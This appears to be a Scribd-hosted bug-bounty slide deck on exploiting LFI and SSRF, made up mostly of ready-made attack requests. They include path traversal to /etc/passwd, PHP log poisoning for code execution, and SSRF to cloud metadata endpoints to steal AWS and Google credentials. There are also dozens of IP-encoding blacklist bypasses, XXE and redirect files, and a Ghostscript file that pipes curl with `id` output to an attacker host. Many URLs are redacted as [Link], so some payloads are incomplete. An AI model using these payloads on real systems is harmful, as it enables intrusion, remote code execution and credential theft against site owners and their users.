Scribd
Upload
74 views61 pages

LFI and SSRF Exploitation Techniques

The document outlines various methodologies for exploiting Local File Inclusion (LFI) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides specific injection techniques and payload examples to access sensitive files and internal services. The techniques include manipulating URLs, using different encoding methods, and bypassing blacklists to extract data from servers.

Uploaded by

PUBG BATTLEGROUND INDIA OFFICAL
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
74 views61 pages

LFI and SSRF Exploitation Techniques

The document outlines various methodologies for exploiting Local File Inclusion (LFI) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides specific injection techniques and payload examples to access sensitive files and internal services. The techniques include manipulating URLs, using different encoding methods, and bypassing blacklists to extract data from servers.

Uploaded by

PUBG BATTLEGROUND INDIA OFFICAL
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

Interaction

File - URL
[Link]

Mahmoud M. Awali
@0xAwali
My Methodology

attacker

Try To Inject ../../../../../etc/passwd OR %252fetc%252fpasswd To Get Content Of


etc/passwd If There Is LFI

● Blog
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Blog Referer: [Link]
Origin: [Link]
● Writeup Content-Length: Number

File-URL=../../../../../etc/passwd
My Methodology

attacker

Use Chineese Separator %E3%80%82 Instead Of DOT e.g.


%E3%80%82%E3%80%82/etc/passwd To Get Content Of etc/passwd

● Tweet
My Methodology

attacker

Try To Inject ../../../../../etc/passwd%00 To Get Content Of etc/passwd If There Is LFI

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=../../../../../etc/passwd%00
My Methodology

attacker

Try To Inject ../../../../../proc/self/fd/Number-FUZZ With Referer Header


<?php system('id');?> To Get RCE

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: <?php system('id');?>
Origin: [Link]
Content-Length: Number

File-URL=../../../../../proc/self/fd/Number-FUZZ
My Methodology

attacker

Try To Inject jsp/etc/../../WEB-INF/[Link] To Get DB Configuration Files


If There Is LFI

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=jsp/etc/../../WEB-INF/[Link]
My Methodology

attacker

Try To Inject [Link] To Get Full Request If There Is SSRF

● Blog
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: [Link]
Origin: [Link]
● Writeup Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Append # OR %0d%0aX:%20 To Your Domain e.g.


[Link] To Bypass Appending Anything After URL

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Inject [Link] To Get Content Of etc/passwd If There Is SSRF

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Inject [Link] To Get Content Of etc/passwd If There Is SSRF

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Inject [Link] To Get Content Of etc/passwd If There Is SSRF

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Inject view-source:[Link] To Get Content Of etc/passwd


If There Is SSRF

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=view-source:[Link]
My Methodology

attacker

Try To Inject [Link] To Get Internal Services

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: [Link]
Origin: [Link]
● Writeup Content-Length: Number

File-URL=[Link]
● Writeup
My Methodology

attacker

Try To Inject [Link] To Extract User data

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Inject [Link] To


Extract Temporary AWS Credentials

● Video POST /Interaction-File-URL HTTP/1.1


Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
● Tweet Origin: [Link]
Content-Length: Number
● Writeup
File-URL=[Link]
● Writeup entials/
My Methodology

attacker

Try To Inject [Link] OR


[Link] To Extract Credentials

● Resource
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Inject [Link] To Extract Kubernetes API

● Tweet
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Inject [Link]


recursive=true To Grab All Internal Metadata

● Tweet POST /Interaction-File-URL HTTP/1.1


Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
ta1/?recursive=true
My Methodology

attacker

Try To Use [Link].[Link] Instead Of [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use base36(int('[Link]')) e.g. [Link] Instead Of


[Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use [Link] Instead Of [Link] To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Change The HTTP Version From 1.1 To HTTP/0.9 And Remove The Host
Header To Bypass Blacklist

● Tweet POST /Interaction-File-URL HTTP/0.9


Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
entials/
My Methodology

attacker

Try To Drop The Zeros e.g. [Link] → [Link] To Bypass Blacklist

● Tweet
My Methodology

attacker

Try To Add Extra Zeros e.g. [Link] To Bypass Blacklist

● Tweet
My Methodology

attacker

Try To Use Dotted Decimal With Overflow e.g. [Link] To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use Dotless Decimal e.g. [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use Dotless Decimal With Overflow e.g. [Link] To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use Dotted Hexadecimal e.g. [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use Dotless Hexadecimal e.g. [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use Dotless Hexadecimal With Overflow e.g. [Link] To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use Dotted Octal e.g. [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use Dotted Octal With Padding e.g. [Link] To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Mix Them e.g. Decimal Overflow + Hex + Octal e.g. [Link]
To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Convert Only Parts Of The Address e.g. Octal + Hex + 2-Byte Wide Dotless
Decimal e.g. [Link] OR [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use IPv4-Compatible Address e.g. [Link] To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use IPv4-Mapped Address e.g. [Link] To Bypass


Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use [Link] To Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

Try To Use [Link] e.g. [Link] OR [Link] To


Bypass Blacklist

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Tweet User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
● Writeup Referer: [Link]
Origin: [Link]
● Writeup Content-Length: Number

File-URL=[Link]
● Writeup
My Methodology

attacker

Try To Use HTTP Redirection To Bypass Blacklist e.g.


[Link] Will Redirect You To I.P.v.4:PORT

● Video
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
List Of Patterns To Bypass The Whitelist

attacker
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
[Link]
● Tweet [Link]
[Link]
[Link]

● Video [Link]
[Link] :80/
[Link]
[Link]
● Payloads [Link]
[Link] :80/
[Link] :80/
[Link]
[Link]
[Link] :80/
[Link]
[Link]
[Link] :80/
My Methodology

attacker

Try To Use [Link] @[Link] To Bypass Blacklist

● Slides
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link] @[Link]
My Methodology

attacker

Try To Use Protocol Wrappers Other Than Http OR HTTPS e.g. SSH , SFTP , POP3 ,
IMAP , SMTP , FTP , DICT , GOPHER OR TFTP e.g. s[Link] To Bypass Blacklist

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=s[Link]
Try To Use This Payload

attacker

POST /Interaction-File-URL HTTP/1.1


Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
● Slides Content-Length: Number

File-URL=php://filter/[Link]-936%2FCP1388|con
vert.base64-encode|convert.base64-encode|[Link].UTF8%
2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|[Link]
se64-encode|convert.base64-encode|[Link].UTF8%2FIBM4
899%2F%2FTRANSLIT|[Link]-printable-encode|convert.i
[Link]-936%2FCP1388/resource=/etc/passwd%20#@%2
0read/resource=[Link]
Try To Use This Payload

attacker

POST /Interaction-File-URL HTTP/1.1


Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
● Slides Content-Length: Number

File-URL=php://filter/[Link]-936%2FCP1388|con
vert.base64-encode|convert.base64-encode|[Link].UTF8%
2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|[Link]
se64-encode|convert.base64-encode|[Link].UTF8%2FIBM4
899%2F%2FTRANSLIT|[Link]-printable-encode|convert.i
[Link]-936%2FCP1388/resource=/etc/passwd%20#@%2
0read/resource=[Link]
[Link]?url=[Link]
My Methodology

attacker

If You Got Blind SSRF Over HTTP OR HTTPS , Try To Request The Unresolvable
Subdomains Because There Are Reachable Subdomains Over Only VPN

● Tweet
My Methodology

attacker

If You Got Blind SSRF Over HTTP OR HTTPS , Try To Request An Internal URL That
Performs Another SSRF That Calls Out To Your Domain e.g. Apache Solr Is Running Internally

● Blog POST /Interaction-File-URL HTTP/1.1


Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
ct?q={!xmlparser v='<!DOCTYPE a SYSTEM
"[Link]
My Methodology

attacker

If There Is [Link] Try To Inject .+./.+./[Link] OR


http:// [Link]:[0-65535]/[Home|Admin|Administrator]/Index? To Get Admin Page

● Slides
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Blog User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=http:// [Link]:PORT/Home/Index?
Reading From Remote XML File

attacker

root@mine:~#cat [Link]
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY read SYSTEM "[Link]
]>
<root><email>&read;</email></root>

POST /Interaction-File-URL HTTP/1.1


● Slides Host: [Link]
User-Agent: Mozilla/5.0
● Tweet Content-Type: application/x-www-form-urlencoded
Referer: [Link]
● Writeup Origin: [Link]
Content-Length: Number

File-URL=[Link]
Reading From Remote mp4 File

attacker

root@mine:~#cat file.mp4
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
[Link]
#EXT-X-ENDLIST

POST /Interaction-File-URL HTTP/1.1


● Writeup Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Reading From Remote Image

attacker

root@mine:~#cat [Link]
%!PS
userdict /setpagedevice undef
Save
Legal
{null restore} stopped {pop} if
{legal} stopped {pop} if
Restore
mark /OutputFile (%pipe%curl${IFS}[Link]/`id`)
currentdevice putdeviceprops

● Blog
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Interaction With Remote URL

attacker

root@mine:~#cat [Link]
<?php
header("Location: [Link]
?>

POST /Interaction-File-URL HTTP/1.1


● Writeup Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Interaction With Remote URL II

attacker

root@mine:~#cat [Link]
<?php
header("Location: [Link] TRUE, 303);
?>

POST /Interaction-File-URL HTTP/1.1


● Writeup Host: [Link]
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
Interaction With Remote URL III

attacker

Steps to produce :-

1 - Try To Set Your Domain e.g. [Link] As


● Writeup Remote URL And Run Wireshark On It
2 - If There Is Range OR Content-Range Header
3 - Try To Response With e.g. Bytes 2M AND
Upload File Less Than Bytes 2M On [Link]
4 - The Company Will Rerequest The Rest Of Bytes 2M
5 - Try To Redirect Second Request To e.g.
[Link]
My Methodology

attacker

If There Is SSRF Try To Inject [Link] To Get XSS

● Writeup
POST /Interaction-File-URL HTTP/1.1
Host: [Link]
● Writeup User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: [Link]
Origin: [Link]
Content-Length: Number

File-URL=[Link]
My Methodology

attacker

If You Can Embedded Videos From Services e.g. Vimeo , Youtube , Twitter , AND
Facebook , Try To Inject XSS Payloads In Their Title AND Description To Get XSS

● Tweet
My Methodology

attacker

Try To Use Open Redirection To Bypass The Blacklist e.g. [Link]


[Link]
=json To Extract Google Metadata

● Video POST /Interaction-File-URL HTTP/1.1


Host: [Link]
User-Agent: Mozilla/5.0
● Video Content-Type: application/x-www-form-urlencoded
Referer: [Link]
● Blog Origin: [Link]
Content-Length: Number
● Writeup
File-URL=[Link]
[Link]/computeMetadata/v1beta1/instance/service-accoun
ts/default/token?alt=json
My Methodology

attacker

Try To Use DNS Rebinding Technique By Using Tools e.g. Singularity OR [Link]
To Bypass The Blacklist

● Video
● Video Steps to produce :-

● Video 2 - Open Your Terminal


3 - Write This Command
● Writeup ./[Link] --ip1=Blacklist --ip2=Allowed --scheme=PORT
Mark Valenzia ● Tweet #BugBounty #BugBountyTip
Hack3rScr0lls ● Tweet #BugBounty #BugBountyTip
Thank
You
Mahmoud M. Awali
@0xAwali

You might also like